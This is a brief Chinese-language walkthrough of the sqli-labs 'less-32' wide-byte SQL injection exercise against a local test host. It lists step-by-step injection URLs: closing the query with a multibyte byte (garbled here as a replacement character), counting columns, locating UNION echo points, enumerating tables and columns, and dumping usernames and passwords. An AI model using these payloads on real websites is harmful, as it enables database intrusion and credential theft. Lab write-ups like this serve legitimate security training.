宽字节注入(less-32)
1.判断注入类型
http://127.0.0.3/less-32/?id=1
http://127.0.0.3/less-32/?id=1'
出现 \' 则证明是宽字节注入
2.构成闭环
http://127.0.0.3/less-32/?id=1�' -- s
显示登录成功则构成闭环
3.查询字段数
http://127.0.0.3/less-32/?id=1�' order by 4 -- s
http://127.0.0.3/less-32/?id=1�' order by 3 -- s
说明字段数为3
4.用union联合查询判断回显点
http://127.0.0.3/less-32/?id=-1�' union select 1,2,3 -- s 记住前面要加 - 因为不加 - 则会正常查询第一个数不会执行联合查询
5.查询数据库名
http://127.0.0.3/less-32/?id=-1�' union select 1,database(),3 -- s
6.查询表名
http://127.0.0.3/less-32/?id=-1�' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479 -- s
爆出security里面的table表
7.查询字段名
http://127.0.0.3/less-32/?id=-1�' union select 1,database(),group_concat(column_name) from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273 -- s
8.查username和password
http://127.0.0.3/less-32/?id=-1�' union select 1,group_concat(username),group_concat(password) from users -- s